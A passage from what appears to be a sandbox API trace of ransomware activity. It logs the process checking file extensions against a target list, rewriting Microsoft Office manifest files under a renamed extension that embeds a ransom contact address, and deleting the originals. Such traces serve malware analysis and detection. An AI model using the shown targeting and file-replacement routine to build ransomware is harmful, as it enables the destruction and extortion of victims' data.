(lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.461] lstrlenW (lpString=".ppt") returned 4 [0059.461] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.461] lstrlenW (lpString=".zip") returned 4 [0059.461] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.461] lstrlenW (lpString=".rar") returned 4 [0059.461] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.461] lstrlenW (lpString=".bz2") returned 4 [0059.461] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.461] lstrlenW (lpString=".7z") returned 3 [0059.461] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.461] lstrlenW (lpString=".dbf") returned 4 [0059.461] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.462] lstrlenW (lpString=".1cd") returned 4 [0059.462] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.462] lstrlenW (lpString=".jpg") returned 4 [0059.462] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.462] lstrlenW (lpString=".doc") returned 4 [0059.462] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.462] lstrlenW (lpString=".docx") returned 5 [0059.462] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.462] lstrlenW (lpString=".pdf") returned 4 [0059.462] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.462] lstrlenW (lpString=".xls") returned 4 [0059.462] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.462] lstrlenW (lpString=".xlsx") returned 5 [0059.462] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.462] lstrlenW (lpString=".ppt") returned 4 [0059.462] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.462] lstrlenW (lpString=".zip") returned 4 [0059.462] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.462] lstrlenW (lpString=".rar") returned 4 [0059.462] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.462] lstrlenW (lpString=".bz2") returned 4 [0059.462] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.462] lstrlenW (lpString=".7z") returned 3 [0059.462] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.463] lstrlenW (lpString=".dbf") returned 4 [0059.463] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.463] lstrlenW (lpString=".1cd") returned 4 [0059.463] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.463] lstrlenW (lpString=".jpg") returned 4 [0059.463] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.463] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.463] lstrlenW (lpString="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 53 [0059.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.463] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=1261) returned 1 [0059.463] CloseHandle (hObject=0x368) returned 1 [0059.463] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.464] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.464] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.464] GetLastError () returned 0x0 [0059.464] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.475] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.476] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0059.476] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.476] SetEndOfFile (hFile=0x344) returned 1 [0059.477] CloseHandle (hObject=0x344) returned 1 [0059.477] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.477] SetEndOfFile (hFile=0x368) returned 1 [0059.478] CloseHandle (hObject=0x368) returned 1 [0059.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.479] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml")) returned 1 [0059.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.479] lstrlenW (lpString=".doc") returned 4 [0059.479] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.479] lstrlenW (lpString=".docx") returned 5 [0059.479] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.479] lstrlenW (lpString=".pdf") returned 4 [0059.479] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.479] lstrlenW (lpString=".xls") returned 4 [0059.479] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.479] lstrlenW (lpString=".xlsx") returned 5 [0059.479] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.479] lstrlenW (lpString=".ppt") returned 4 [0059.479] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.480] lstrlenW (lpString=".zip") returned 4 [0059.480] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.480] lstrlenW (lpString=".rar") returned 4 [0059.480] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.480] lstrlenW (lpString=".bz2") returned 4 [0059.480] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.480] lstrlenW (lpString=".7z") returned 3 [0059.480] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.480] lstrlenW (lpString=".dbf") returned 4 [0059.480] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.480] lstrlenW (lpString=".1cd") returned 4 [0059.480] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.480] lstrlenW (lpString=".jpg") returned 4 [0059.480] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.480] lstrlenW (lpString=".doc") returned 4 [0059.481] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.481] lstrlenW (lpString=".docx") returned 5 [0059.481] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.481] lstrlenW (lpString=".pdf") returned 4 [0059.481] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.481] lstrlenW (lpString=".xls") returned 4 [0059.481] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.481] lstrlenW (lpString=".xlsx") returned 5 [0059.481] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.481] lstrlenW (lpString=".ppt") returned 4 [0059.481] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.481] lstrlenW (lpString=".zip") returned 4 [0059.481] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.481] lstrlenW (lpString=".rar") returned 4 [0059.481] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.481] lstrlenW (lpString=".bz2") returned 4 [0059.481] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.481] lstrlenW (lpString=".7z") returned 3 [0059.481] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.481] lstrlenW (lpString=".dbf") returned 4 [0059.481] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.481] lstrlenW (lpString=".1cd") returned 4 [0059.481] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0059.481] lstrlenW (lpString=".jpg") returned 4 [0059.481] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.482] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.482] lstrlenW (lpString="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 53 [0059.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.482] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=1261) returned 1 [0059.482] CloseHandle (hObject=0x368) returned 1 [0059.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.483] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.483] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.483] GetLastError () returned 0x0 [0059.483] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.607] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.608] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0059.608] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.608] SetEndOfFile (hFile=0x344) returned 1 [0059.608] CloseHandle (hObject=0x344) returned 1 [0059.609] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.609] SetEndOfFile (hFile=0x368) returned 1 [0059.610] CloseHandle (hObject=0x368) returned 1 [0059.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.611] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml")) returned 1 [0059.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.611] lstrlenW (lpString=".doc") returned 4 [0059.611] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.611] lstrlenW (lpString=".docx") returned 5 [0059.611] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.611] lstrlenW (lpString=".pdf") returned 4 [0059.611] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.611] lstrlenW (lpString=".xls") returned 4 [0059.611] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.611] lstrlenW (lpString=".xlsx") returned 5 [0059.611] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.611] lstrlenW (lpString=".ppt") returned 4 [0059.611] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.611] lstrlenW (lpString=".zip") returned 4 [0059.611] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.612] lstrlenW (lpString=".rar") returned 4 [0059.612] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.612] lstrlenW (lpString=".bz2") returned 4 [0059.612] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.612] lstrlenW (lpString=".7z") returned 3 [0059.612] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.612] lstrlenW (lpString=".dbf") returned 4 [0059.612] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.612] lstrlenW (lpString=".1cd") returned 4 [0059.612] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.612] lstrlenW (lpString=".jpg") returned 4 [0059.612] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.612] lstrlenW (lpString=".doc") returned 4 [0059.612] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.612] lstrlenW (lpString=".docx") returned 5 [0059.612] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.612] lstrlenW (lpString=".pdf") returned 4 [0059.612] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.612] lstrlenW (lpString=".xls") returned 4 [0059.612] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.612] lstrlenW (lpString=".xlsx") returned 5 [0059.612] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.613] lstrlenW (lpString=".ppt") returned 4 [0059.613] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.613] lstrlenW (lpString=".zip") returned 4 [0059.613] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.613] lstrlenW (lpString=".rar") returned 4 [0059.613] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.613] lstrlenW (lpString=".bz2") returned 4 [0059.613] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.613] lstrlenW (lpString=".7z") returned 3 [0059.613] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.613] lstrlenW (lpString=".dbf") returned 4 [0059.613] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.613] lstrlenW (lpString=".1cd") returned 4 [0059.613] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0059.613] lstrlenW (lpString=".jpg") returned 4 [0059.613] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.613] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.613] lstrlenW (lpString="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 53 [0059.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.614] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3375) returned 1 [0059.614] CloseHandle (hObject=0x368) returned 1 [0059.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.615] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.615] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.615] GetLastError () returned 0x0 [0059.615] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xd2f, lpOverlapped=0x0) returned 1 [0059.660] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xd30, lpOverlapped=0x0) returned 1 [0059.661] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0059.661] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.661] SetEndOfFile (hFile=0x344) returned 1 [0059.661] CloseHandle (hObject=0x344) returned 1 [0059.662] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: 